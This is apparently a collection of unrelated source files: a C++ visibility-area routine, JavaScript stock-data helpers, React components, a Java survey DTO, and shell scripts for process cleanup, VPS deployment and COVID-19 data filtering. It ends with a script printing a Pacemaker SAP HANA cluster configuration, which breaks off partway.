                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,yb);)
                    break;
                case 3:
                    pointlist.push_back({min(xr,R),yb,0,0});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",min(xr,R),yb);)
                    pointlist.push_back({xl,min(yt,R),0,1});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,min(yt,R));)
                    if(xl!=xr&&yt!=yb)pointlist.push_back({xl,yb,0,2});
                    break;
                case 4:
                    pointlist.push_back({xr,yt,0,0});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,yt);)
                    pointlist.push_back({xr,yb,0,1});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,yb);)
                    break;
                case 6:
                    pointlist.push_back({xl,yb,0,0});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,yb);)
                    pointlist.push_back({xl,yt,0,1});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,yt);)
                    break;
                case 7:
                    pointlist.push_back({max(xl,-R),yt,0,0});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",max(xl,-R),yt);)
                    pointlist.push_back({xr,max(yb,-R),0,1});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,max(yb,-R));)
                    if(xl!=xr&&yt!=yb)pointlist.push_back({xr,yt,0,2});
                    break;
                case 8:
                    pointlist.push_back({xl,yt,0,0});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,yt);)
                    pointlist.push_back({xr,yt,0,1});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,yt);)
                    break;
                case 9:
                    pointlist.push_back({xl,max(yb,-R),0,0});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xl,max(yb,-R));)
                    pointlist.push_back({min(xr,R),yt,0,1});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",min(xr,R),yt);)
                    if(xl!=xr&&yt!=yb)pointlist.push_back({xl,yt,0,2});
                    break;
            }
        }
        Debug(
        for(auto i:pointlist){
            printf("point: %lf %lf %d \n",i.point.x,i.point.y,i.type);
        }
        for(auto i:sidelist){
            printf("side: %lf %lf %lf %lf \n",i.p1.x,i.p1.y,i.p2.x,i.p2.y);
        }
        )
        // Keep only sweep points directly visible from the origin; for each
        // non-corner point also cast the ray onwards and record where it
        // lands on the nearest side behind it (the far end of the shadow
        // boundary).
        vector<PointList>point_ans;
        for(auto p:pointlist){
            Debug(printf(" point: %lf %lf\n",p.point.x,p.point.y);)
            bool vaild=true;   // sic "valid": point not occluded by any side
            double min_dis=10000;
            double k;
            // Scale p away from the origin so the ray 0 -> far_p certainly
            // crosses the square boundary; k is taken from whichever
            // coordinate is usable (avoids dividing by a near-zero one).
            if(abs(p.point.x)<eps){
                k=(R+10)/abs(p.point.y);
            }else if(abs(p.point.y)<eps){
                k=(R+10)/abs(p.point.x);
            }else {
                k=(R+10)/min(abs(p.point.x),abs(p.point.y));
            }
            Point far_p={p.point.x*k,p.point.y*k};
            Debug(printf(" far_p: %lf %lf\n",far_p.x,far_p.y);)
            Point far_inter={NAN,NAN};;
            for(auto s:sidelist){
                // Any intersection strictly between the origin and p means
                // p is hidden behind this side.
                Point inter=Intersection({0,0},p.point,s.p1,s.p2);
                Debug(printf(" side: %lf %lf %lf %lf \n",s.p1.x,s.p1.y,s.p2.x,s.p2.y);)
                Debug(printf(" inter: %lf %lf \n",inter.x,inter.y);)
                if(inter!=p.point&&!std::isnan(inter.x)){
                    vaild=false;
                    Debug(printf(" unvaild \n");)
                    break;
                }
                // Otherwise track the closest side hit by the extended ray:
                // that is where p's shadow boundary lands.
                inter=Intersection({0,0},far_p,s.p1,s.p2);
                Debug(printf(" inter2: %lf %lf \n",inter.x,inter.y); )
                if(p.type!=2&&!std::isnan(inter.x)&&inter!=s.p1&&inter!=s.p2){
                    if(hypot(inter.x,inter.y)<min_dis){
                        min_dis=hypot(inter.x,inter.y);
                        Debug(printf(" far_int: %lf %lf %lf\n",inter.x,inter.y,min_dis);)
                        far_inter=inter;
                    }
                }
            }
            if(vaild){
                point_ans.push_back({p.point,get_angle(p.point),p.type});
                // The shadow endpoint gets the complementary end type
                // (1-p.type) so cmp_point orders the pair consistently.
                if(p.type!=2) point_ans.push_back({far_inter,get_angle(far_inter),1-p.type});
                Debug(printf(" far_point: %lf %lf\n",far_inter.x,far_inter.y);)
            }
        }
        // Order the boundary points of the visible region by angle, then
        // take the shoelace area of the resulting star-shaped polygon.
        sort(point_ans.begin(),point_ans.end(),cmp_point);
        Debug(fprintf(ggb,"----------------- \nvar a = ggbApplet; \na.evalCommand('Polygon[");)
        Debug(for(auto p:point_ans){
            printf("point_ans: %lf %lf %lf %d\n",p.point.x,p.point.y,p.angle,p.type);
            fprintf(ggb,"(%lf,%lf), ",p.point.x,p.point.y);
        })
        Debug(fprintf(ggb,"]'); \n");)
        int sz=point_ans.size();
        double ans=0;
        for(int q=0;q<sz-1;q++){
            ans+=point_ans[q].point.x*point_ans[q+1].point.y;
            ans-=point_ans[q+1].point.x*point_ans[q].point.y;
        }
        // Close the polygon: last vertex back to the first.
        ans+=point_ans[sz-1].point.x*point_ans[0].point.y;
        ans-=point_ans[0].point.x*point_ans[sz-1].point.y;
        Debug(cout<<fixed<<R*R*4<<endl<<abs(ans)/2<<endl<<obstacle_ans<<endl;)
        // invisible = square area - visible polygon area - obstacle area
        cout<<fixed<<setprecision(2)<<R*R*4-abs(ans)/2-obstacle_ans<<endl;
    }
}
|
<filename>server/utils/insights.js
// The helpers in this module expect daily-granularity [timestamp, value]
// pairs (one entry per day), as required by the assignment.
// Returns the [timestamp, volume] pair with the highest volume, wrapped as
// { max_volume: pair }. Empty input yields { max_volume: 0 }, matching the
// old implementation's reduce-with-0 seed.
// (The original seeded reduce with the number 0 and relied on 0[1] being
// undefined to discard the seed on the first comparison — made explicit here.)
const maxVolume = (volumes) => {
    if (volumes.length === 0) return { 'max_volume': 0 }
    return {
        // no seed needed: ties keep the later pair, exactly like the old scan
        'max_volume': volumes.reduce((best, current) => (best[1] > current[1]) ? best : current)
    }
}
// Finds the longest continuous downtrend (strictly decreasing value) in a
// time-ordered list of [timestamp_ms, price] pairs.
// Returns { longest_downtrend: { found: false } } when no downtrend exists;
// otherwise the trend's start/end pairs and its length in days.
const longestDowntrend = (prices) => {
    let priceNow, priceNext, trendEnded
    let trendStarted = null
    let longestTrend = 0
    let response = { 'longest_downtrend': {'found': false }}
    if(prices.length < 2) return response

    // Builds the result object for the trend delimited by start/end.
    const describe = (start, end) => ({ 'longest_downtrend':
        { 'found': true ,
          'start': start,
          'end': end,
          'length_in_days': (end[0] - start[0]) /1000/60/60/24 }
    })

    for(let i = 0; i < prices.length - 1; i++) {
        priceNow = prices[i]
        priceNext = prices[i + 1]
        // in a downtrend
        if(priceNow[1] > priceNext[1]) {
            trendEnded = priceNext
            if(trendStarted === null) trendStarted = priceNow
        }
        // downtrend just ended
        else if(trendStarted !== null) {
            const trendLength = trendEnded[0] - trendStarted[0]
            if(trendLength > longestTrend) {
                longestTrend = trendLength
                response = describe(trendStarted, trendEnded)
            }
            trendStarted = null
        }
    }
    // BUG FIX: a downtrend still open when the data ends was previously only
    // recorded when NO earlier trend had been closed (longestTrend === 0), so
    // a final trend longer than an earlier one was silently dropped. Compare
    // it like any other trend instead.
    if(trendStarted !== null && trendEnded[0] - trendStarted[0] > longestTrend) {
        response = describe(trendStarted, trendEnded)
    }
    return response
}
// Single-pass best buy/sell scan: tracks the cheapest price seen so far and
// the largest (sell - buy) spread with buy strictly before sell.
// Returns { max_profit: { should_buy: false, profit: 0 } } when no profitable
// trade exists (fewer than two samples, or prices never rise).
const maxProfit = (prices) => {
    let result = { 'max_profit': { 'should_buy': false, 'profit': 0 } }
    if(prices.length < 2) return result

    let cheapest = prices[0]
    let bestBuy, bestSell
    let bestGain = 0
    for(const candidate of prices.slice(1)) {
        if(candidate[1] < cheapest[1]) {
            // a strictly lower price becomes the new buy point
            cheapest = candidate
        } else if(candidate[1] - cheapest[1] > bestGain) {
            // bigger spread than anything seen so far: remember both ends
            bestGain = candidate[1] - cheapest[1]
            bestBuy = cheapest
            bestSell = candidate
        }
    }

    if(bestGain > 0) {
        result = { 'max_profit': {
            'should_buy': true,
            'when_to_buy': bestBuy,
            'when_to_sell': bestSell,
            'profit': bestGain
        }
        }
    }
    return result
}
// Public API of this module; each helper consumes [timestamp, value] pairs.
module.exports = {
    maxVolume,
    longestDowntrend,
    maxProfit
}
<filename>vendor/rxjs/add/operator/buffer.js
// Side-effect module (vendored rxjs "add" pattern): importing this file
// patches the `buffer` operator onto Observable.prototype. Nothing is
// exported — the import alone performs the augmentation.
import { Observable } from '../../Observable';
import { buffer } from '../../operator/buffer';
Observable.prototype.buffer = buffer;
|
#!/bin/sh -e

# Port the rpcdaemon instance under test listens on.
RPCDAEMONPORT=8548

# Finds and kills a process whose ps line matches both a name and a port.
kill_process() {
    # $1 - process name
    # $2 - port
    if [ -n "$1" ]; then
        # 'grep -v grep' excludes the grep command itself from the ps
        # listing; without it the pipeline could match its own grep and
        # report a pid that no longer exists by the time we kill it.
        # Arguments are quoted so patterns with spaces don't word-split.
        RPCDAEMONPID=$(ps aux | grep "$1" | grep -v grep | grep "$2" | awk '{print $2}')
        if [ -z "$RPCDAEMONPID" ]; then
            echo "no process $1 running on port $2"
        else
            echo "killing $1 on port $2 with pid $RPCDAEMONPID"
            kill $RPCDAEMONPID
        fi
    fi
}

kill_process "rpcdaemon" $RPCDAEMONPORT
|
import React from 'react'
import ReactDOM from 'react-dom'
import Carousel from '../src'
// Shared inline styles: each demo slide is a fixed-height flexbox that
// centres its label.
const slideStyles = {
  alignItems: 'center',
  display: 'flex',
  justifyContent: 'center',
  height: '400px'
}

// Example settings kept for reference; <Carousel> below runs on its defaults.
// const settings = {
//   isInfinite: false,
//   slidesToShow: 1,
//   transitionDuration: 300
// }

// Four coloured slides exercising the Carousel component from ../src.
const Example = () => (
  <Carousel>
    <div style={{ ...slideStyles, backgroundColor: '#F44336' }}>Test 1</div>
    <div style={{ ...slideStyles, backgroundColor: '#2196F3' }}>Test 2</div>
    <div style={{ ...slideStyles, backgroundColor: '#4CAF50' }}>Test 3</div>
    <div style={{ ...slideStyles, backgroundColor: '#FFEB3B' }}>Test 4</div>
  </Carousel>
)

// Mount the demo into the page's #root element.
ReactDOM.render(<Example />, document.getElementById('root'))
|
<reponame>mahendrabishnoi2/survey-application
package com.mahendra.survey.newresponse;
/**
 * Plain DTO pairing one survey question with the answer a respondent gave:
 * the question's id, text and type label together with the free-text answer
 * and the selected option ids encoded in a single string.
 */
public class AnswerSingleQuestion {
  Long questionId;          // id of the question being answered
  String questionText;      // question as shown to the respondent
  String questionTypeText;  // label describing the question type
  String answerText;        // free-text answer, if any
  String selectedOptionIds; // ids of selected options, encoded in one string

  /** Creates a fully populated answer record. */
  public AnswerSingleQuestion(
      Long questionId,
      String questionText,
      String questionTypeText,
      String answerText,
      String selectedOptionIds) {
    this.questionId = questionId;
    this.questionText = questionText;
    this.questionTypeText = questionTypeText;
    this.answerText = answerText;
    this.selectedOptionIds = selectedOptionIds;
  }

  public Long getQuestionId() { return questionId; }

  public void setQuestionId(Long questionId) { this.questionId = questionId; }

  public String getQuestionText() { return questionText; }

  public void setQuestionText(String questionText) { this.questionText = questionText; }

  public String getQuestionTypeText() { return questionTypeText; }

  public void setQuestionTypeText(String questionTypeText) { this.questionTypeText = questionTypeText; }

  public String getAnswerText() { return answerText; }

  public void setAnswerText(String answerText) { this.answerText = answerText; }

  public String getSelectedOptionIds() { return selectedOptionIds; }

  public void setSelectedOptionIds(String selectedOptionIds) { this.selectedOptionIds = selectedOptionIds; }

  /**
   * Same {@code AnswerSingleQuestion{...}} layout the previous handwritten
   * concatenation produced (null fields render as the text "null").
   */
  @Override
  public String toString() {
    return String.format(
        "AnswerSingleQuestion{questionId=%d, questionText='%s', questionTypeText='%s', answerText='%s', selectedOptionIds='%s'}",
        questionId, questionText, questionTypeText, answerText, selectedOptionIds);
  }
}
|
#!/bin/bash
set -eu

# cd into root to get the project name from path
cd ..
PROJECT_NAME="$(basename "$PWD")"

read -p "Production server username (used to SSH into VPS): " PROD_SERVER_USER
read -p "Production server IP: " PROD_SERVER_IP

echo
echo "============================="
echo "=== Set up project on VPS ==="
echo "============================="
echo
echo "1. SSH into VPS"
echo "2. Recreate project structure required by the production version of 'docker-compose.yml'"
echo "3. Log out of VPS"
# Fixed: the original nested unescaped double quotes inside the remote
# command and piped mkdir's (empty) output into 'exit' — both only worked by
# accident. Quote the remote command once and run mkdir directly.
ssh "$PROD_SERVER_USER@$PROD_SERVER_IP" "mkdir -p /home/$PROD_SERVER_USER/$PROJECT_NAME/node"
echo
echo "4. Copy the '.env' file from local machine to VPS to /home/$PROD_SERVER_USER/$PROJECT_NAME/node/"
rsync \
    --progress \
    --archive \
    --rsh=ssh \
    ./node/.env \
    "$PROD_SERVER_USER@$PROD_SERVER_IP:/home/$PROD_SERVER_USER/$PROJECT_NAME/node/"
echo
# Fixed: step numbering previously jumped from 4 to 7.
echo "5. Copy the production version of 'docker-compose.yml' to VPS to /home/$PROD_SERVER_USER/$PROJECT_NAME/"
rsync \
    --progress \
    --archive \
    --rsh=ssh \
    ./docker-compose.yml "$PROD_SERVER_USER@$PROD_SERVER_IP:/home/$PROD_SERVER_USER/$PROJECT_NAME/"
echo
echo "The project has been set up on VPS successfully!"
|
# This script downloads covid19 data published by the Mexican federal health
# secretariat and filters it by a given criterion — here, keeping only the
# confirmed cases whose comorbidities are obesity and/or smoking.

# Download the data and unzip it
echo "Descargando datos y posteriormente descomprimiendo..."
curl -O http://datosabiertos.salud.gob.mx/gobmx/salud/datos_abiertos/datos_abiertos_covid19.zip
unzip *.zip

# Drop the comorbidities other than obesity and smoking
echo "Removiendo casos con comorbilidades, excepto obesidad y tabaquismo..."
csvgrep -c DIABETES,EPOC,ASMA,INMUSUPR,HIPERTENSION,OTRA_COM,CARDIOVASCULAR,RENAL_CRONICA -m "2" *.csv > tabaq_obesidad.csv

# Select the variables used in the analysis
echo "Extrayendo columnas que se usaran en este analisis..."
csvcut -c SEXO,ENTIDAD_RES,FECHA_DEF,EDAD,OBESIDAD,TABAQUISMO,CLASIFICACION_FINAL tabaq_obesidad.csv > tabaq_obesidad_filtrado.csv

# Drop the unspecified obesity/smoking cases, keeping only positive (1) and
# negative (2) values
echo "Removiendo casos no especificados de obesidad y tabaquismo, y extrayendo solamente casos positivos de covid19..."
csvgrep -c OBESIDAD,TABAQUISMO -r "[12]" tabaq_obesidad_filtrado.csv | csvgrep -c CLASIFICACION_FINAL -r "[123]" > tabaq-obesidad-covid19.csv

# Move the resulting csv file to the data folder, where the docker volume is
# mounted
# mkdir data
mv tabaq-obesidad-covid19.csv data
echo "Los datos resultantes han sido movidos a la carpeta data en donde se encuentra montado el volumen de docker."

# Delete the intermediate files, keeping only the resulting dataset
rm *.csv
rm *.zip
<reponame>Frozen-Fairies/Grace-Shopper
import React from 'react'
import {Link, Route} from 'react-router-dom'
import SingleMovieView from './singleMovieView'
// One movie tile for a catalogue grid: title, poster image and price,
// wrapped in a link to the movie's detail route /movies/<genre>/<uniqueId>.
const SingleMovie = props => {
  const {movie} = props
  return (
    <div className="column is-one-quarter">
      {/* NOTE(review): genre.slice(0) copies the string unchanged —
          presumably only toLowerCase() is needed here; confirm. */}
      <Link
        to={`/movies/${movie.genre.slice(0).toLowerCase()}/${movie.uniqueId}`}
      >
        <div className="level">
          <div className="level-item has-text-centered">
            <h1>{movie.title}</h1>
          </div>
        </div>
        <img src={movie.imageUrl} />
        <div className="level">
          <div className="level-item has-text-centered">
            {/* price appears to be stored in cents — TODO confirm */}
            <p>${movie.price / 100}</p>
          </div>
        </div>
      </Link>
    </div>
  )
}

export default SingleMovie
|
#!/bin/sh
# Emits a canned Pacemaker CIB (cluster information base) XML document on
# stdout. The fixture describes a two-node SAP HANA system-replication
# cluster (hana01 primary / hana02 secondary, SID PRD, instance 00) managed
# by the SUSE SAPHana/SAPHanaTopology resource agents, with sbd fencing, a
# floating IP (IPaddr2) and a prometheus-hanadb_exporter systemd resource.
# NOTE: the heredoc body is this script's output — it must stay byte-exact,
# so all commentary lives outside it.
cat <<EOF
<cib crm_feature_set="3.3.0" validate-with="pacemaker-3.3" epoch="474" num_updates="0" admin_epoch="0" cib-last-written="Mon Apr 19 22:04:07 2021" update-origin="hana01" update-client="crm_attribute" update-user="root" have-quorum="1" dc-uuid="1084787210">
<configuration>
<crm_config>
<cluster_property_set id="cib-bootstrap-options">
<nvpair id="cib-bootstrap-options-have-watchdog" name="have-watchdog" value="true"/>
<nvpair id="cib-bootstrap-options-dc-version" name="dc-version" value="2.0.4+20200616.2deceaa3a-3.3.1-2.0.4+20200616.2deceaa3a"/>
<nvpair id="cib-bootstrap-options-cluster-infrastructure" name="cluster-infrastructure" value="corosync"/>
<nvpair id="cib-bootstrap-options-cluster-name" name="cluster-name" value="hana_cluster"/>
<nvpair name="stonith-enabled" value="true" id="cib-bootstrap-options-stonith-enabled"/>
</cluster_property_set>
<cluster_property_set id="SAPHanaSR">
<nvpair id="SAPHanaSR-hana_prd_site_srHook_Site2" name="hana_prd_site_srHook_Site2" value="SOK"/>
</cluster_property_set>
</crm_config>
<nodes>
<node id="1084787210" uname="hana01">
<instance_attributes id="nodes-1084787210">
<nvpair id="nodes-1084787210-lpa_prd_lpt" name="lpa_prd_lpt" value="1618862646"/>
<nvpair id="nodes-1084787210-hana_prd_vhost" name="hana_prd_vhost" value="hana01"/>
<nvpair id="nodes-1084787210-hana_prd_site" name="hana_prd_site" value="Site1"/>
<nvpair id="nodes-1084787210-hana_prd_op_mode" name="hana_prd_op_mode" value="logreplay"/>
<nvpair id="nodes-1084787210-hana_prd_srmode" name="hana_prd_srmode" value="sync"/>
<nvpair id="nodes-1084787210-hana_prd_remoteHost" name="hana_prd_remoteHost" value="hana02"/>
</instance_attributes>
</node>
<node id="1084787211" uname="hana02">
<instance_attributes id="nodes-1084787211">
<nvpair id="nodes-1084787211-lpa_prd_lpt" name="lpa_prd_lpt" value="30"/>
<nvpair id="nodes-1084787211-hana_prd_op_mode" name="hana_prd_op_mode" value="logreplay"/>
<nvpair id="nodes-1084787211-hana_prd_vhost" name="hana_prd_vhost" value="hana02"/>
<nvpair id="nodes-1084787211-hana_prd_remoteHost" name="hana_prd_remoteHost" value="hana01"/>
<nvpair id="nodes-1084787211-hana_prd_site" name="hana_prd_site" value="Site2"/>
<nvpair id="nodes-1084787211-hana_prd_srmode" name="hana_prd_srmode" value="sync"/>
</instance_attributes>
</node>
</nodes>
<resources>
<primitive id="stonith-sbd" class="stonith" type="external/sbd">
<instance_attributes id="stonith-sbd-instance_attributes">
<nvpair name="pcmk_delay_max" value="30s" id="stonith-sbd-instance_attributes-pcmk_delay_max"/>
</instance_attributes>
</primitive>
<primitive id="rsc_ip_PRD_HDB00" class="ocf" provider="heartbeat" type="IPaddr2">
<!--#####################################################-->
<!--# Fencing agents - Native agents for cloud providers-->
<!--#####################################################-->
<!--######################################-->
<!--# Floating IP address resource agents-->
<!--######################################-->
<instance_attributes id="rsc_ip_PRD_HDB00-instance_attributes">
<nvpair name="ip" value="192.168.138.12" id="rsc_ip_PRD_HDB00-instance_attributes-ip"/>
<nvpair name="cidr_netmask" value="24" id="rsc_ip_PRD_HDB00-instance_attributes-cidr_netmask"/>
<nvpair name="nic" value="eth1" id="rsc_ip_PRD_HDB00-instance_attributes-nic"/>
</instance_attributes>
<operations>
<op name="start" timeout="20" interval="0" id="rsc_ip_PRD_HDB00-start-0"/>
<op name="stop" timeout="20" interval="0" id="rsc_ip_PRD_HDB00-stop-0"/>
<op name="monitor" interval="10" timeout="20" id="rsc_ip_PRD_HDB00-monitor-10"/>
</operations>
</primitive>
<primitive id="rsc_exporter_PRD_HDB00" class="systemd" type="prometheus-hanadb_exporter@PRD_HDB00">
<!--#######################################-->
<!--# non-production HANA - Cost optimized-->
<!--#######################################-->
<!--###############################-->
<!--# Active/Active HANA resources-->
<!--###############################-->
<!--######################################-->
<!--# prometheus-hanadb_exporter resource-->
<!--######################################-->
<operations>
<op name="start" interval="0" timeout="100" id="rsc_exporter_PRD_HDB00-start-0"/>
<op name="stop" interval="0" timeout="100" id="rsc_exporter_PRD_HDB00-stop-0"/>
<op name="monitor" interval="10" id="rsc_exporter_PRD_HDB00-monitor-10"/>
</operations>
<meta_attributes id="rsc_exporter_PRD_HDB00-meta_attributes">
<nvpair name="target-role" value="Started" id="rsc_exporter_PRD_HDB00-meta_attributes-target-role"/>
</meta_attributes>
</primitive>
<master id="msl_SAPHana_PRD_HDB00">
<meta_attributes id="msl_SAPHana_PRD_HDB00-meta_attributes">
<nvpair name="clone-max" value="2" id="msl_SAPHana_PRD_HDB00-meta_attributes-clone-max"/>
<nvpair name="clone-node-max" value="1" id="msl_SAPHana_PRD_HDB00-meta_attributes-clone-node-max"/>
<nvpair name="interleave" value="true" id="msl_SAPHana_PRD_HDB00-meta_attributes-interleave"/>
</meta_attributes>
<primitive id="rsc_SAPHana_PRD_HDB00" class="ocf" provider="suse" type="SAPHana">
<instance_attributes id="rsc_SAPHana_PRD_HDB00-instance_attributes">
<nvpair name="SID" value="PRD" id="rsc_SAPHana_PRD_HDB00-instance_attributes-SID"/>
<nvpair name="InstanceNumber" value="00" id="rsc_SAPHana_PRD_HDB00-instance_attributes-InstanceNumber"/>
<nvpair name="PREFER_SITE_TAKEOVER" value="True" id="rsc_SAPHana_PRD_HDB00-instance_attributes-PREFER_SITE_TAKEOVER"/>
<nvpair name="AUTOMATED_REGISTER" value="False" id="rsc_SAPHana_PRD_HDB00-instance_attributes-AUTOMATED_REGISTER"/>
<nvpair name="DUPLICATE_PRIMARY_TIMEOUT" value="7200" id="rsc_SAPHana_PRD_HDB00-instance_attributes-DUPLICATE_PRIMARY_TIMEOUT"/>
</instance_attributes>
<operations>
<op name="start" interval="0" timeout="3600" id="rsc_SAPHana_PRD_HDB00-start-0"/>
<op name="stop" interval="0" timeout="3600" id="rsc_SAPHana_PRD_HDB00-stop-0"/>
<op name="promote" interval="0" timeout="3600" id="rsc_SAPHana_PRD_HDB00-promote-0"/>
<op name="monitor" interval="60" role="Master" timeout="700" id="rsc_SAPHana_PRD_HDB00-monitor-60"/>
<op name="monitor" interval="61" role="Slave" timeout="700" id="rsc_SAPHana_PRD_HDB00-monitor-61"/>
</operations>
</primitive>
</master>
<clone id="cln_SAPHanaTopology_PRD_HDB00">
<meta_attributes id="cln_SAPHanaTopology_PRD_HDB00-meta_attributes">
<nvpair name="is-managed" value="true" id="cln_SAPHanaTopology_PRD_HDB00-meta_attributes-is-managed"/>
<nvpair name="clone-node-max" value="1" id="cln_SAPHanaTopology_PRD_HDB00-meta_attributes-clone-node-max"/>
<nvpair name="interleave" value="true" id="cln_SAPHanaTopology_PRD_HDB00-meta_attributes-interleave"/>
</meta_attributes>
<primitive id="rsc_SAPHanaTopology_PRD_HDB00" class="ocf" provider="suse" type="SAPHanaTopology">
<!--#####################-->
<!--# SAP HANA resources-->
<!--#####################-->
<instance_attributes id="rsc_SAPHanaTopology_PRD_HDB00-instance_attributes">
<nvpair name="SID" value="PRD" id="rsc_SAPHanaTopology_PRD_HDB00-instance_attributes-SID"/>
<nvpair name="InstanceNumber" value="00" id="rsc_SAPHanaTopology_PRD_HDB00-instance_attributes-InstanceNumber"/>
</instance_attributes>
<operations>
<op name="monitor" interval="10" timeout="600" id="rsc_SAPHanaTopology_PRD_HDB00-monitor-10"/>
<op name="start" interval="0" timeout="600" id="rsc_SAPHanaTopology_PRD_HDB00-start-0"/>
<op name="stop" interval="0" timeout="300" id="rsc_SAPHanaTopology_PRD_HDB00-stop-0"/>
</operations>
</primitive>
</clone>
</resources>
<constraints>
<rsc_colocation id="col_saphana_ip_PRD_HDB00" score="2000" rsc="rsc_ip_PRD_HDB00" rsc-role="Started" with-rsc="msl_SAPHana_PRD_HDB00" with-rsc-role="Master"/>
<rsc_order id="ord_SAPHana_PRD_HDB00" kind="Optional" first="cln_SAPHanaTopology_PRD_HDB00" then="msl_SAPHana_PRD_HDB00"/>
<rsc_colocation id="col_exporter_PRD_HDB00" score="+INFINITY" rsc="rsc_exporter_PRD_HDB00" rsc-role="Started" with-rsc="msl_SAPHana_PRD_HDB00" with-rsc-role="Master"/>
</constraints>
<rsc_defaults>
<meta_attributes id="rsc-options">
<nvpair name="resource-stickiness" value="1000" id="rsc-options-resource-stickiness"/>
<nvpair name="migration-threshold" value="5000" id="rsc-options-migration-threshold"/>
</meta_attributes>
</rsc_defaults>
<op_defaults>
<meta_attributes id="op-options">
<nvpair name="timeout" value="600" id="op-options-timeout"/>
<nvpair name="record-pending" value="true" id="op-options-record-pending"/>
</meta_attributes>
</op_defaults>
</configuration>
<status>
<node_state id="1084787210" uname="hana01" in_ccm="true" crmd="online" crm-debug-origin="do_state_transition" join="member" expected="member">
<transient_attributes id="1084787210">
<instance_attributes id="status-1084787210">
<nvpair id="status-1084787210-master-rsc_SAPHana_PRD_HDB00" name="master-rsc_SAPHana_PRD_HDB00" value="150"/>
<nvpair id="status-1084787210-hana_prd_version" name="hana_prd_version" value="2.00.040.00.1553674765"/>
<nvpair id="status-1084787210-hana_prd_clone_state" name="hana_prd_clone_state" value="PROMOTED"/>
<nvpair id="status-1084787210-hana_prd_sync_state" name="hana_prd_sync_state" value="PRIM"/>
<nvpair id="status-1084787210-hana_prd_roles" name="hana_prd_roles" value="4:P:master1:master:worker:master"/>
</instance_attributes>
</transient_attributes>
<lrm id="1084787210">
<lrm_resources>
<lrm_resource id="stonith-sbd" type="external/sbd" class="stonith">
<lrm_rsc_op id="stonith-sbd_last_0" operation_key="stonith-sbd_start_0" operation="start" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="2:0:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;2:0:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="6" rc-code="0" op-status="0" interval="0" last-rc-change="1618834289" last-run="1618834289" exec-time="1270" queue-time="0" op-digest="265be3215da5e5037d35e7fe1bcc5ae0"/>
</lrm_resource>
<lrm_resource id="rsc_exporter_PRD_HDB00" type="prometheus-hanadb_exporter@PRD_HDB00" class="systemd">
<lrm_rsc_op id="rsc_exporter_PRD_HDB00_last_0" operation_key="rsc_exporter_PRD_HDB00_start_0" operation="start" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="8:6:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;8:6:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="38" rc-code="0" op-status="0" interval="0" last-rc-change="1618834310" last-run="1618834310" exec-time="2267" queue-time="0" op-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_exporter_PRD_HDB00_monitor_10000" operation_key="rsc_exporter_PRD_HDB00_monitor_10000" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="9:7:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;9:7:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="41" rc-code="0" op-status="0" interval="10000" last-rc-change="1618834310" exec-time="2" queue-time="0" op-digest="0d721f3bcf63b8d121ad4839b260e42a"/>
</lrm_resource>
<lrm_resource id="rsc_SAPHanaTopology_PRD_HDB00" type="SAPHanaTopology" class="ocf" provider="suse">
<lrm_rsc_op id="rsc_SAPHanaTopology_PRD_HDB00_last_0" operation_key="rsc_SAPHanaTopology_PRD_HDB00_start_0" operation="start" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="20:2:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;20:2:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="29" rc-code="0" op-status="0" interval="0" last-rc-change="1618834294" last-run="1618834294" exec-time="3852" queue-time="0" op-digest="2d8d79c3726afb91c33d406d5af79b53" op-force-restart="" op-restart-digest="f2317cad3d54cec5d7d7aa7d0bf35cf8"/>
<lrm_rsc_op id="rsc_SAPHanaTopology_PRD_HDB00_monitor_10000" operation_key="rsc_SAPHanaTopology_PRD_HDB00_monitor_10000" operation="monitor" crm-debug-origin="build_active_RAs" crm_feature_set="3.3.0" transition-key="24:3:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" transition-magic="0:0;24:3:0:f8dd70dd-608c-49ba-8126-85e2cbebc787" exit-reason="" on_node="hana01" call-id="32" rc-code="0" op-status="0" interval="10000" last-rc-change="1618834298" exec-time="4107" queue-time="0" op-digest="64db68ca3e12e0d41eb98ce63b9610d2"/>
</lrm_resource>
<lrm_resource id="rsc_ip_PRD_HDB00" type="IPaddr2" class="ocf" provider="heartbeat">
